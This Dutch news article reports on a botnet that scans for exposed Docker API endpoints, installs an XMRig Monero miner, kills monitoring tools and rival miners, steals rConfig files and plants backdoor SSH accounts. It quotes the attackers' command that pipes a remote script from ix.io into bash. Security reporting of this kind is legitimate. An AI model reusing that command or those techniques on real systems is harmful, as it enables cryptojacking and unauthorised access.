Een hackergroep scant sinds 24 november massaal het internet op Docker-platforms die API-eindpunten online hebben. De hackers willen met behulp van blootgestelde Docker-instanties een cryptocurrency miners installeren.
Door de enorme omvang viel de massale scanoperatie meteen op. In de twee dagen dat deze campagne actief is, zou de hackersgroep inmiddels al 14.82 Monero-munten (XMR) hebben gemined ter waarde van 740 dollar, aldus ZDnet.
Grote toename van scanactiviteiten
“Gebruikers van de Bad Packets CTI API zullen opmerken dat exploitactiviteit gericht op blootgestelde Docker-instanties niets nieuws is en vrij vaak gebeurt. Wat deze campagne onderscheidt, is de grote toename van scanactiviteiten. Dat alleen al rechtvaardigt verder onderzoek om erachter te komen wat dit botnet van plan is”, zegt Troy Mursch, chief research officer en mede-oprichter van Bad Packets LLC. Hij ontdekte de scanoperatie.
Alpine Linux OS-container
Volgens Mursch gaat het niet om de gemiddelde script kiddie exploit-poging. Er zou aanzienlijk wat moeite zijn gestoken in de campagne, die vooralsnog niet volledig is geanalyseerd. Wel is bekend dat de hackersgroep momenteel meer dan 59.000 IP-netwerken (netblocks) scant op zoek naar zichtbare Docker-instanties. Zodra de groep een zichtbare host identificeert, gebruiken aanvallers het API-eindpunt om een ​​Alpine Linux OS-container te starten. Hier voeren ze de volgende opdracht uit:
chroot / mnt / bin / sh -c ‘curl -sL4 http://ix.io/1XQa | bash;
Deze opdracht downloadt vervolgens een Bash-script en voert dat uit vanaf de server van de aanvallers. Het script installeert een klassieke XMRRig cryptocurrency miner. “Een onoriginele maar interessante functie van de campagne is, dat het bekende monitoring-agenten verwijdert en een heleboel processen doodt via een script gedownload van http: // ix [.] Io / 1XQh”, aldus Mursch.
Rivaliserende cryptocurrency-mining-botnets
Wat verder opvalt in het script, is dat hackers niet alleen beveiligingsproducten uitschakelen. Ze sluiten ook processen af ​​die zijn gekoppeld zijn aan rivaliserende cryptocurrency-mining-botnets, zoals DDG.
Mursch ontdekte ook nog een functie van het kwaadaardige script, dat een geïnfecteerde host scant op rConfig-configuratiebestanden. Deze worden gecodeerd en gestolen, waarna de bestanden worden terugstuurd naar de command en controlserver van de hackeresgroep. Daarbij ontdekte Craig H. Rowland, de oprichter van Sandfly Security, dat hackers backdoor-accounts op de gehackte containers maken en SSH-sleutels achterlaten voor gemakkelijkere toegang. Bovendien is het ook een manier om alle geïnfecteerde bots vanaf een externe locatie te besturen.
Organisaties die Docker-instanties uitvoeren, worden aangeraden onmiddelijk te controleren of ze API-eindpunten op internet weergeven. Als dat het geval is, moeten ze direct de poorten sluiten en niet-herkende actieve containers beëindigen.